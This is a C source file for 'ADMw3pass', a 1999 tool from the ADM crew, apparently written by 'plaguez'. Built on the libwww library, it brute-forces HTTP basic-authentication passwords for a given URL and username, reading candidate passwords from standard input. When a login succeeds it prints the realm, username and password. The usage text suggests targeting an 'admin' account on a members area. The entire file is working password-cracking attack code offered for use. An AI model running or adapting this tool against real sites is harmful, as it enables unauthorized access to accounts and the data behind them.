/*
                      ___      ______      _       _
                    /     \   |   _   \   |  \   /  |
                   |  / \  |  |  |  \  |  |   \_/   |
                   | |___| |  |  |_ /  |  |   \_/   |
..oO  THE          |  ---  |  |       /   |  |   |  |         CreW Oo..
                   '''   '''   '''''''    ''''   ''''
                               presents
                        
*/

#include "WWWLib.h"
#include "WWWApp.h"
#include "WWWMIME.h"
#include "WWWHTML.h"
#include "WWWNews.h"
#include "WWWHTTP.h"
#include "WWWFTP.h"
#include "WWWFile.h"
#include "WWWGophe.h"
#include "WWWStream.h"
#include "WWWTrans.h"
#include "WWWInit.h"

#ifndef MAXSIZE
#define MAXSIZE 1024
#endif

char *username;
char passwd[MAXSIZE];
char realm[MAXSIZE];


PRIVATE int printer (const char * fmt, va_list pArgs)
{
    return (vfprintf(stdout, fmt, pArgs));
}


PRIVATE int tracer (const char * fmt, va_list pArgs)
{
    return (vfprintf(stderr, fmt, pArgs));
}


PRIVATE BOOL nextpass(HTRequest *request, HTAlertOpcode op,int msgnum, 
		const char * dfault, void * input, HTAlertPar * reply)
{
    	char * rlm = (char *) input;
	
	strcpy(realm,rlm);

	memset(passwd,'\0',MAXSIZE);
	fgets(passwd,MAXSIZE-1,stdin);
	if(passwd[strlen(passwd)-1]=='\n')
		passwd[strlen(passwd)-1]='\0';
	
	if (request)
	if (realm) {
	    HTAlert_setReplyMessage(reply, username );
	    HTAlert_setReplySecret(reply, passwd);
	    return YES;
	} else 
		fprintf(stderr,"\n\nNo realm!\n\n");
	return NO;
}


PRIVATE BOOL yes(HTRequest *request, HTAlertOpcode op,int msgnum, 
		const char * dfault, void * input, HTAlertPar * reply)
{
	if(request)
		return YES;
}



PRIVATE int terminate_handler (HTRequest * request, HTResponse * response,
			       void * param, int status) 
{
    if (status == HT_LOADED)
	{
	fprintf(stderr,"\n[PASSWORD FOUND]\n\trealm: %s\n\tusername: %s\n\tpasswd: %s\n\n",realm,username,passwd);
	HTRequest_delete(request);
	HTProfile_delete();
	exit(-2);	
    } else {
	HTAlertCallback *cbf = HTAlert_find(HT_A_MESSAGE);
	if (cbf) (*cbf)(request, HT_A_MESSAGE, HT_MSG_NULL, NULL,
			HTRequest_error(request), NULL);
    }
    return HT_OK;
}


void usage(char *me)
{
	fprintf(stderr,"\nADMw3pass - 06/23/99 plaguez");
	fprintf(stderr,"\n\n\tUsage: %s url username",me);
	fprintf(stderr,"\n\nexample:\t%s http://www.sexpics.com/members/ admin",me);
	fprintf(stderr,"\n\twill brute force http password for user admin.\n");
	fprintf(stderr,"\tPasswords are read from standard input.\n\n");
}


int main (int argc, char ** argv)
{
    	int		status = 0;	
    	int		arg;
    	int		tokencount = 0;
    	BOOL		formdata = NO;
    	HTChunk *	keywords = NULL;
    	HTAssocList*	formfields = NULL;
    	HTMethod	method = METHOD_GET;
    	BOOL		cache = NO;
    	BOOL		flush = NO;
    	char *		cache_root = NULL;
    	HTParentAnchor *anchor;
    	HTRequest *	request=HTRequest_new();
    	char *		cwd=HTGetCurrentDirectoryURL();
	char *		ref;
    	FILE *		output;
	int 		timer=20000;

	if(argc!=3)
	{
		usage(argv[0]);
		exit(1);
	}
			
	username=argv[2];
	HTRequest_setOutputFormat(request, WWW_SOURCE);
      	HTProfile_newNoCacheClient("ADMw3pass", "1.0");
      	HTPrint_setCallback(printer);
    	HTTrace_setCallback(tracer);
     	HTAlert_deleteOpcode(HT_A_USER_PW);
    	HTAlert_add(nextpass, HT_A_USER_PW);
	HTAlert_deleteOpcode(HT_A_SECRET);
    	HTAlert_add(nextpass, HT_A_USER_PW);
     	HTAlert_deleteOpcode(HT_A_CONFIRM);
    	HTAlert_add(yes, HT_A_CONFIRM);
	
    	HTFormat_addCoding("*", HTIdentityCoding, HTIdentityCoding, 0.3);
	ref = HTParse(argv[1], cwd, PARSE_ALL);
	anchor = (HTParentAnchor *) HTAnchor_findAddress(ref);
	HT_FREE(ref);
	HTCache_flushAll();
      	HTAlert_deleteOpcode(HT_A_PROGRESS);
	HTRequest_setOutputStream(request,HTFWriter_new(request,stdout, YES));
    	HTHost_setEventTimeout(timer);
    	HTRequest_setFlush(request, YES);
    	HTNet_addAfter(terminate_handler, NULL, NULL, HT_ALL, HT_FILTER_LAST);

	fprintf(stderr,"\nEnter passwords:\n");    	
	/* start request */
     	status = HTLoadAnchor((HTAnchor *) anchor, request);
    	if (status != YES) 
		HTPrint("Sorry, can't access resource\n");
    	
    	HTEventList_loop(request);

    	fprintf(stderr,"\n\nError, exiting.\n\n");
	return 0;
}

